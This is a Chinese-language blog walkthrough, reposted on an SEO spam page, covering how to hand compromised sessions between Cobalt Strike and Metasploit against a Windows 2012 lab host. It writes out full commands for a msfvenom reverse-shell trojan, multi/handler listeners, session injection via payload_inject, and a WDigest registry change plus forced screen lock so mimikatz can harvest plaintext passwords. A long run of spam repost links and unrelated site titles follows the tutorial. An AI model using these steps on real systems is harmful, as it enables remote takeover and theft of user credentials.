当前位置: 首页 > news >正文 自己做网站要办手续吗公司注册app流程下载 news 2025/10/25 13:24:20 自己做网站要办手续吗,公司注册app流程下载,深圳企业主页制作,常州网络推广价格cs与msf权限传递#xff0c;以及mimikatz抓取win10明文密码 1、环境准备2、Cobalt Strike ------ MSF2.1 Cobalt Strike拿权限2.2 将CS权限传递给msf 3、MSF ------ Cobalt Strike3.1 msf拿权限3.2 将msf权限传递给CS 4、使用mimikatz抓取明文密码 1、环境准备 攻击以及mimikatz抓取win10明文密码 1、环境准备2、Cobalt Strike ------ MSF2.1 Cobalt Strike拿权限2.2 将CS权限传递给msf 3、MSF ------ Cobalt Strike3.1 msf拿权限3.2 将msf权限传递给CS 4、使用mimikatz抓取明文密码 1、环境准备 攻击【kali cs服务端192.168.111.129】、【win11 cs客户端192.168.111.145】 靶机windows 2012192.168.111.130 2、Cobalt Strike ------ MSF 2.1 Cobalt Strike拿权限 1、kali开启cs服务端 ┌──(root㉿kali)-[/home/kali/Desktop/cs_start] └─# ./teamserver 192.168.111.129 123452、window11开启cs客户端与服务端连接 3、建立监听器 4、生成木马 5、生成木马之后将生成的木马程序拖到window2012然后运行程序发现目标已经上线 6、上线之后就可以对目标主机的操控 成功拿下权限 2.2 将CS权限传递给msf 1、建立监听器 2、在kali打开msf开启msfconsole ┌──(root㉿kali)-[/home/kali] └─# msfconsole2、调用 exploit/multi/handler 模块将监听的ip地址与端口设置为在cs上建立监听保持一致。 msf6 use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) set payload windows/meterpreter/reverse_http payload windows/meterpreter/reverse_http msf6 exploit(multi/handler) set lhost 192.168.111.129 lhost 192.168.111.129 msf6 exploit(multi/handler) set lport 9999 lport 9999 msf6 exploit(multi/handler) exploit 3、然后进行传递 最后返回msf就可以看到传递成功了 最后由于 3、MSF ------ Cobalt Strike 3.1 msf拿权限 1、在msfvenom生成木马 msf6 msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST192.168.111.129 LPORT7777 -f exe msfshell.exe2、使用msfconsole启动MetasploitFramework设置meterpreter监听用于接收后门文件反弹到shell将生成的木马文件放置到win2012中。 msf6 use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) set payload windows/meterpreter/reverse_tcp payload windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) set lhost 192.168.111.129 lhost 192.168.111.129 msf6 exploit(multi/handler) set lport 7777 lport 7777 msf6 exploit(multi/handler) exploit 3、将获取到的会话挂至后台会看到一个会话sessions id meterpreter background [*] Backgrounding session 1...3.2 将msf权限传递给CS 1、在cs上新建监听器 2、调用 payload_inject 模块将指定会话session id注入到新到CobaltStrike会话中 msf6 exploit(windows/local/payload_inject) use exploit/windows/local/payload_inject [*] Using configured payload windows/meterpreter/reverse_http msf6 exploit(windows/local/payload_inject) set payload windows/meterpreter/reverse_http payload windows/meterpreter/reverse_http msf6 exploit(windows/local/payload_inject) set lhost 192.168.111.129 lhost 192.168.111.129 msf6 exploit(windows/local/payload_inject) set lhost 80 lhost 80 msf6 exploit(windows/local/payload_inject) set DisablePayloadHandler true DisablePayloadHandler true msf6 exploit(windows/local/payload_inject) set PrependMigrate true PrependMigrate true msf6 exploit(windows/local/payload_inject) set session 1 session 1 msf6 exploit(windows/local/payload_inject) exploit 上述步骤完成后在CobaltStrike中就可以看到MetasploitFramework传递过来到会话了 4、使用mimikatz抓取明文密码 1、抓取明文密码 2、抓取到的密码显示null这是由于Windows在win10或Windows2012R2以上时默认的缓存表中是不存在明文密码的显示为null 3、可以通过修改注册表来让Wdigest Auth保存明文口令shell reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f 4、修改注册表之后需要用户重新登录才可以生效把如下代码保存为lock-screen.ps1 Function Lock-WorkStation {$signature [DllImport(user32.dll, SetLastError true)] public static extern bool LockWorkStation(); $LockWorkStation Add-Type -memberDefinition $signature -name Win32LockWorkStation -namespace Win32Functions -passthru $LockWorkStation::LockWorkStation() | Out-Null }Lock-WorkStation5、重新输入密码就可以获取明文密码 文章转载自: http://www.morning.ntgjm.cn.gov.cn.ntgjm.cn http://www.morning.bpmnz.cn.gov.cn.bpmnz.cn http://www.morning.brzlp.cn.gov.cn.brzlp.cn http://www.morning.knqck.cn.gov.cn.knqck.cn http://www.morning.zmwzg.cn.gov.cn.zmwzg.cn http://www.morning.kqhlm.cn.gov.cn.kqhlm.cn http://www.morning.bsxws.cn.gov.cn.bsxws.cn http://www.morning.lmfxq.cn.gov.cn.lmfxq.cn http://www.morning.drggr.cn.gov.cn.drggr.cn http://www.morning.fmrd.cn.gov.cn.fmrd.cn http://www.morning.nlryq.cn.gov.cn.nlryq.cn http://www.morning.kzcfp.cn.gov.cn.kzcfp.cn http://www.morning.nkkr.cn.gov.cn.nkkr.cn http://www.morning.frtb.cn.gov.cn.frtb.cn http://www.morning.fpjw.cn.gov.cn.fpjw.cn http://www.morning.bsrcr.cn.gov.cn.bsrcr.cn http://www.morning.kclkb.cn.gov.cn.kclkb.cn http://www.morning.cpzkq.cn.gov.cn.cpzkq.cn http://www.morning.qpsxz.cn.gov.cn.qpsxz.cn http://www.morning.qkgwx.cn.gov.cn.qkgwx.cn http://www.morning.gkjyg.cn.gov.cn.gkjyg.cn http://www.morning.knqck.cn.gov.cn.knqck.cn http://www.morning.bnqcm.cn.gov.cn.bnqcm.cn http://www.morning.ydxwj.cn.gov.cn.ydxwj.cn http://www.morning.dfbeer.com.gov.cn.dfbeer.com http://www.morning.pdynk.cn.gov.cn.pdynk.cn http://www.morning.zkgpg.cn.gov.cn.zkgpg.cn http://www.morning.qcwrm.cn.gov.cn.qcwrm.cn http://www.morning.rjkfj.cn.gov.cn.rjkfj.cn http://www.morning.yxwnn.cn.gov.cn.yxwnn.cn http://www.morning.kdxzy.cn.gov.cn.kdxzy.cn http://www.morning.pyncm.cn.gov.cn.pyncm.cn http://www.morning.lbhck.cn.gov.cn.lbhck.cn http://www.morning.ksgjn.cn.gov.cn.ksgjn.cn http://www.morning.qcfgd.cn.gov.cn.qcfgd.cn http://www.morning.hcxhz.cn.gov.cn.hcxhz.cn http://www.morning.pfntr.cn.gov.cn.pfntr.cn http://www.morning.dglszn.com.gov.cn.dglszn.com http://www.morning.flfxb.cn.gov.cn.flfxb.cn http://www.morning.ygrdb.cn.gov.cn.ygrdb.cn http://www.morning.qwqzk.cn.gov.cn.qwqzk.cn http://www.morning.kncrc.cn.gov.cn.kncrc.cn http://www.morning.mttqp.cn.gov.cn.mttqp.cn http://www.morning.xjpnq.cn.gov.cn.xjpnq.cn http://www.morning.cknsx.cn.gov.cn.cknsx.cn http://www.morning.srnhk.cn.gov.cn.srnhk.cn http://www.morning.nlkjq.cn.gov.cn.nlkjq.cn http://www.morning.mgwpy.cn.gov.cn.mgwpy.cn http://www.morning.fjscr.cn.gov.cn.fjscr.cn http://www.morning.ztcxx.com.gov.cn.ztcxx.com http://www.morning.ndmbz.cn.gov.cn.ndmbz.cn http://www.morning.rmmz.cn.gov.cn.rmmz.cn http://www.morning.pbmg.cn.gov.cn.pbmg.cn http://www.morning.wbfg.cn.gov.cn.wbfg.cn http://www.morning.pcgjj.cn.gov.cn.pcgjj.cn http://www.morning.rqlf.cn.gov.cn.rqlf.cn http://www.morning.rlsd.cn.gov.cn.rlsd.cn http://www.morning.wkknm.cn.gov.cn.wkknm.cn http://www.morning.heleyo.com.gov.cn.heleyo.com http://www.morning.datadragon-auh.cn.gov.cn.datadragon-auh.cn http://www.morning.gyjld.cn.gov.cn.gyjld.cn http://www.morning.lxhrq.cn.gov.cn.lxhrq.cn http://www.morning.kcnjz.cn.gov.cn.kcnjz.cn http://www.morning.xpfwr.cn.gov.cn.xpfwr.cn http://www.morning.wrkcw.cn.gov.cn.wrkcw.cn http://www.morning.yprjy.cn.gov.cn.yprjy.cn http://www.morning.fssjw.cn.gov.cn.fssjw.cn http://www.morning.rfyk.cn.gov.cn.rfyk.cn http://www.morning.brwnd.cn.gov.cn.brwnd.cn http://www.morning.bmyrl.cn.gov.cn.bmyrl.cn http://www.morning.dmcqy.cn.gov.cn.dmcqy.cn http://www.morning.lgsqy.cn.gov.cn.lgsqy.cn http://www.morning.lxcwh.cn.gov.cn.lxcwh.cn http://www.morning.mczjq.cn.gov.cn.mczjq.cn http://www.morning.bpttm.cn.gov.cn.bpttm.cn http://www.morning.rblqk.cn.gov.cn.rblqk.cn http://www.morning.jlktz.cn.gov.cn.jlktz.cn http://www.morning.qxrct.cn.gov.cn.qxrct.cn http://www.morning.mumgou.com.gov.cn.mumgou.com http://www.morning.gpryk.cn.gov.cn.gpryk.cn 查看全文 http://www.tj-hxxt.cn/news/248269.html 相关文章: 一键建站系统源码惠州网站建设科技有限公司 网站的构成要素运营小程序的成本有哪些 网站开发课设报告书gps建站教程 网站的做公司wordpress微信文章 呼伦贝尔人才网官方网站入口公司网站百度推广 qq怎么做自己的网站ss和wordpress 网站分类代码湖南it网站建设mxtia 做移动端网站软件开发企业网站php 辽宁建网站海东高端网站建设 广告手机网站制作近期军事新闻热点事件 珠海做网站焦作会做网站制作的有哪家 申请摇号广州网站南宁外贸网络营销 北京建设行政主管部门官方网站一品猪网站开发 asp网站自动识别手机毕设做网站需要买域名么 新网站改关键词开发公司购买的游乐设备计入什么科目 怎么在微信上做网站株洲有几个区 做网站建设怎么样爱站网 关键词挖掘 建站之星网站模版商城怎么可以上传自己做的网站 如何做自己网站云播给大家推荐免费视频服务器 优秀简洁网站设计品牌网站建设蔻大蝌蚪 西宁网站设计制作公司回龙观网站建设 长春广告公司网站建设网站规划与网页设计案例 国内信息图制作网站有哪些网站怎么优化排名的方法 3000ok新开传奇网站公益服深圳市营销策划有限公司 石家庄百度提升优化上海百度seo公司 网站定制开发优点ckeditor导入wordpress 数据查询网站如何做雅茂道网站建设 网站正在备案中网站域名跳转代码 做设计的兼职网站有哪些建设工程教育网题库 怎么做传奇网站图做的网站电脑上跟手机上不一样吗
